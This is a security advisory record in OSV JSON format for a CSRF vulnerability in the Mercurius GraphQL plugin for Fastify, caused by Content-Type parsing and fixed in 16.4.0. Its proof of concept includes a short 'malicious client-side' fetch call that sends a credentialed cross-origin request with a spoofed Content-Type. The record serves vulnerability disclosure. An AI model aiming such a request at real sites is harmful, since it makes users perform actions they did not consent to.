{"id":"GHSA-v66j-6wwf-jc57","summary":"Mercurius: Incorrect Content-Type parsing can lead to CSRF attack","details":"### Summary\n\nA Cross-Site Request Forgery (CSRF) vulnerability was identified in Mercurius versions 16. The issue arises from incorrect parsing of the `Content-Type` header in requests. Specifically, requests with `Content-Type` values such as `application/x-www-form-urlencoded`, `multipart/form-data`, or `text/plain` could be misinterpreted as `application/json`. This misinterpretation bypasses the preflight checks performed by the `fetch()` API, potentially allowing unauthorized actions to be performed on behalf of an authenticated user.\n\n---\n\n### Impact\n\nAn attacker could exploit this vulnerability by crafting a malicious request with a `Content-Type` that Fastify incorrectly parses as `application/json`. When such a request is made from a different origin, it bypasses the Cross-Origin Resource Sharing (CORS) protections, leading to a potential CSRF attack. This could result in unauthorized actions being performed on behalf of an authenticated user without their consent.\n\n---\n\n### Proof of Concept\n\n```javascript\n// Server-side Fastify setup\nconst Fastify = require('fastify');\nconst mercurius = require('mercurius');\n\nconst app = Fastify();\nconst schema = `\n  type Query {\n    hello(name: String): String\n  }\n`;\n\nconst resolvers = {\n  Query: {\n    hello: (_, { name }) =\u003e `Hello ${name || 'World'}!`\n  }\n};\n\napp.register(mercurius, { schema, resolvers });\n\napp.listen(3000, () =\u003e {\n  console.log('Server listening on http://localhost:3000');\n});\n```\n\n```javascript\n// Malicious client-side code\nfetch('http://localhost:3000/graphql', {\n  method: 'POST',\n  body: JSON.stringify({ query: '{ hello(name: \"attacker\") }' }),\n  headers: {\n    'Content-Type': 'application/x-www-form-urlencoded'\n  },\n  credentials: 'include'\n});\n```\n\nIn the above example, the malicious request is crafted to exploit the CSRF vulnerability by using a `Content-Type` that Fastify incorrectly parses as `application/json`.\n\n---\n\n### Mitigation\n\nTo address this vulnerability, CSRF protection has been implemented.\n\n## References\n\n* https://github.com/mercurius-js/mercurius/pull/1187","aliases":["CVE-2025-64166"],"modified":"2026-03-05T20:46:36.485530Z","published":"2026-03-05T18:18:01Z","database_specific":{"github_reviewed_at":"2026-03-05T18:18:01Z","severity":"MODERATE","nvd_published_at":"2026-03-05T16:16:11Z","cwe_ids":["CWE-352"],"github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/mercurius-js/mercurius/security/advisories/GHSA-v66j-6wwf-jc57"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64166"},{"type":"WEB","url":"https://github.com/mercurius-js/mercurius/pull/1187"},{"type":"WEB","url":"https://github.com/mercurius-js/mercurius/commit/962d402ec7a92342f4a1b7f5f04af01776838c3c"},{"type":"PACKAGE","url":"https://github.com/mercurius-js/mercurius"}],"affected":[{"package":{"name":"mercurius","ecosystem":"npm","purl":"pkg:npm/mercurius"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"16.4.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-v66j-6wwf-jc57/GHSA-v66j-6wwf-jc57.json","last_known_affected_version_range":"\u003c= 16.3.0"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"}]}